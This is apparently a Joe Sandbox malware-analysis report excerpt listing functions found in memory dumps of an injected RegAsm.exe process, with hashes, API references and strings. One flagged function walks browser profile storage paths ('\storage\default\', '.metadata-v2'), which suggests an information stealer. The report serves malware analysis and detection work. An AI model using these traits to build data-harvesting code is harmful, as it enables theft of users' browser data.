Opcode ID: 678305e043295050cee88acfb4b23d2106059796112ecb3903692d9b8efc984f
Instruction ID: 25ff4a3ce910d1ed33decc22a0338513101dd125106fa7f02cb314c4864dbade
Opcode Fuzzy Hash: 678305e043295050cee88acfb4b23d2106059796112ecb3903692d9b8efc984f
Instruction Fuzzy Hash: D9918C71A083458FD304CF6CD89175AFBE4EBC8344F48492EE48ACB751E7B9D9098B92

Function 1927CBF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1927CE39

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: f5e9666115bcaaff0d779a1fc8c29d9437a0609a4975019ff89c6967cd749434
Instruction ID: 9b697a77efdb3b63edb7cf77ee678c123db038f3c83126006437994e9cd13aa0
Opcode Fuzzy Hash: f5e9666115bcaaff0d779a1fc8c29d9437a0609a4975019ff89c6967cd749434
Instruction Fuzzy Hash: DD8113B5E043028FC308DF28D981B57B7E5AFA8310F6C496CF985A7391E375EA458792

Function 193578F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

?, xrefs: 1935794A
*, xrefs: 19357982

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: 68e171360a7e2dea2817ffcf51e5878f31b010aa7d37589ee38f1666867badf2
Instruction ID: b0b729f683480f40aa3ab748b90a4ed0138aa4434a342ba7dffb7d5aeb9c031b
Opcode Fuzzy Hash: 68e171360a7e2dea2817ffcf51e5878f31b010aa7d37589ee38f1666867badf2
Instruction Fuzzy Hash: 6D711B706043958FE7169F28C884B1BBBE6EF8D200F4C466DE8CB87345D775D94587A2

Function 1924C8E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

ESCAPE expression must be a single character, xrefs: 1924CA43
LIKE or GLOB pattern too complex, xrefs: 1924C94F

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 0-264706735
Opcode ID: d2da3b5b7ec15e98ae057e8eebb743fb50681c73b651efcf35d2cfcccbded51b
Instruction ID: 8bbd5e980719e38fceab97bac76be60d436904489be9e37695fe1b0f894526e4
Opcode Fuzzy Hash: d2da3b5b7ec15e98ae057e8eebb743fb50681c73b651efcf35d2cfcccbded51b
Instruction Fuzzy Hash: 16617A75E082A36FDB0CCE1CC982BF677D1AB42324F3C4659E4925B2D2D676D885C351

Function 0040AFAF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040AFB4

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040A981: _EH_prolog.MSVCRT ref: 0040A986
Part of subcall function 0040A981: wsprintfA.USER32 ref: 0040A9AF
Part of subcall function 0040A981: FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040A9E3
Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040A9FD
Part of subcall function 0040A981: lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AAAD

Strings

.metadata-v2, xrefs: 0040B071
\storage\default\, xrefs: 0040AFF5

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
String ID: .metadata-v2$\storage\default\
API String ID: 2418158533-762053450
Opcode ID: f9589811858bd53b6f2c56ef5cb768d1ec6d44e1cf31d85bf6b84f01be8c7b91
Instruction ID: 169141139e08e17bd9d9f82fa4a2ec5826fa215f6f172615a64578a92b691924
Opcode Fuzzy Hash: f9589811858bd53b6f2c56ef5cb768d1ec6d44e1cf31d85bf6b84f01be8c7b91
Instruction Fuzzy Hash: 13613A70905288EACB14EBE5D556BDDBBB4AF19308F50417EE805736C2DB781B0CCBA6

Function 1924D0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1924D213

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 3f54ee4196b34ae906b250b823f7e99ac5e526093c3e9d71c879705fb1ea39c5
Instruction ID: 6abb650899c49290ecc842f48d943ba7a6ffecc1d61594f1e53723f909f098da
Opcode Fuzzy Hash: 3f54ee4196b34ae906b250b823f7e99ac5e526093c3e9d71c879705fb1ea39c5
Instruction Fuzzy Hash: 3F416A769043424FE7148A289C4179B7B95AF61360F7C4A2DEC9D533D2D626F608C392

Function 192455D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

winDelete, xrefs: 1924569C
delayed %dms for lock/sharing conflict at line %d, xrefs: 192456D1

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: 6252c4b589307261fa537d8559205880b0d9a2ca611b403a40b56a1b63d46054
Instruction ID: 961766bf01defa09462ff33ed9242f431a67c9d503fcdcc58f93174339fa1fab
Opcode Fuzzy Hash: 6252c4b589307261fa537d8559205880b0d9a2ca611b403a40b56a1b63d46054
Instruction Fuzzy Hash: A1319172A012AB4BE70C6E38DEC8D567718E700265F3D0736EE8BCB6D1D621C444C6A2

Function 1924D300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1924D3D5

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 5d9179494f6f470ad12fb8a3ccb187d075402fe64fdc7593a31ce5a12fbec17e
Instruction ID: 05f96a8f62535b2dc96c2ff2d053e563d0a2642ca59c89852782018af4fc424e
Opcode Fuzzy Hash: 5d9179494f6f470ad12fb8a3ccb187d075402fe64fdc7593a31ce5a12fbec17e
Instruction Fuzzy Hash: C431AFB6D042665BD7184A14AD01B663F599B82368F3C42A8FD55AF3C2C267FD06CFE0

Function 1932DEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

sqlite_stat1, xrefs: 1932DF30
SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1932DF4F

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
API String ID: 0-3572622772
Opcode ID: 8c6f14d81286de36f7ee6e4d2fe407099d25fbff47f9c70d98575cd3bccba1bb
Instruction ID: 9e98a71a6cc32a68bedefa2cc77e8e126f228443db99ed99f506d8679e6dc94b
Opcode Fuzzy Hash: 8c6f14d81286de36f7ee6e4d2fe407099d25fbff47f9c70d98575cd3bccba1bb
Instruction Fuzzy Hash: D121F375A013426FDB10DE25DC84E6BB3B8EF81A24B9D422CFC949B291E320FC14CB95

Function 193C7E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 193C7ED9

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: 7c1bd43bcfb73b3999ef7d1268c1b2bc56656f0bae5abf72c58defeb4639b6fa
Instruction ID: 76fda1e8484500870c86ecdffd77832f096da9236c8e4e3bba420523cacd89e6
Opcode Fuzzy Hash: 7c1bd43bcfb73b3999ef7d1268c1b2bc56656f0bae5abf72c58defeb4639b6fa
Instruction Fuzzy Hash: 6421B3726006A4ABE7059B74DD88F5B37A8FF04656F184625FD0AD1190DB30D910D7A3

Function 1923141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 19410E84
GetXStateFeaturesMask, xrefs: 19410E34

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: 723cdd02b39bc11e978d891426f57c4b4186592b394b50bad1b2c788c06387c1
Instruction ID: e46362489e0e2b534c9ed532471ae57e27f57ad99ab045906ac0247590c45d5f
Opcode Fuzzy Hash: 723cdd02b39bc11e978d891426f57c4b4186592b394b50bad1b2c788c06387c1
Instruction Fuzzy Hash: 5F01A23AA40268B7DB116AD2CC05ECF3F16EB407A2F898021FD1D29314DB72AD61D6D4

Function 1925F740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1925F752

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
API String ID: 0-2071071404
Opcode ID: 3d0bab38433939820abb7f3086776e16bc9da83733c1753ea0f6e6d89357c93a
Instruction ID: 884f576fbc4b7adb4ce875045aadea44ace9df8ade2761d46931022946518569
Opcode Fuzzy Hash: 3d0bab38433939820abb7f3086776e16bc9da83733c1753ea0f6e6d89357c93a
Instruction Fuzzy Hash: C011C675600195AFF3049B78DDC9FEB73ACEB44209F584229FE0AD2291EB60F944C672

Function 0040E048 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040E062

Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B

Part of subcall function 0040DE51: std::_Xinvalid_argument.LIBCPMT ref: 0040DE62

memcpy.MSVCRT ref: 0040E0BD

Strings

invalid string position, xrefs: 0040E05D

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
String ID: invalid string position
API String ID: 214693668-1799206989
Opcode ID: adb162555bb1dc51adecccd48a928655473fd20a05b9e363fce7d2c458d50710
Instruction ID: b9813761b05a122dd8aed8326cf999b782d45421acb08efd83d9390538f341b4
Opcode Fuzzy Hash: adb162555bb1dc51adecccd48a928655473fd20a05b9e363fce7d2c458d50710
Instruction Fuzzy Hash: 1C112B31308224DBDB249E1A9C40A2AB3A5EB95714F100D3FF852AB3C1D7F9D850C79E

Function 0040DFAF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040DFF4
memcpy.MSVCRT ref: 0040E024

Strings

string too long, xrefs: 0040DFEF

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentmemcpystd::_
String ID: string too long
API String ID: 1835169507-2556327735
Opcode ID: a7804603839e34a47926d4d4e8eea39133707d68188460ae4548f68c22849222
Instruction ID: a8c71809997a943f8247e46865462385ee80d849e33b5082b4ef7bb8c1a6b5f3
Opcode Fuzzy Hash: a7804603839e34a47926d4d4e8eea39133707d68188460ae4548f68c22849222
Instruction Fuzzy Hash: 2411CB317006509BDB349F6EC940A6BB7A9EF41754710493FF443AB2C1CBBADC198799

Function 19265350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 1926539B

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 6f14b928efae57e66d4444f010c7325bb3808b804822cee8e8079551469130fe
Instruction ID: 0c5676c751335088f6a2ab784d5514d27905ecc2d5af4c1cc7ca777c12bdb176
Opcode Fuzzy Hash: 6f14b928efae57e66d4444f010c7325bb3808b804822cee8e8079551469130fe
Instruction Fuzzy Hash: B41130B66083458BD704DF25C451B5FB7E4AFD8215F88486EE88A87390E774E648CB93

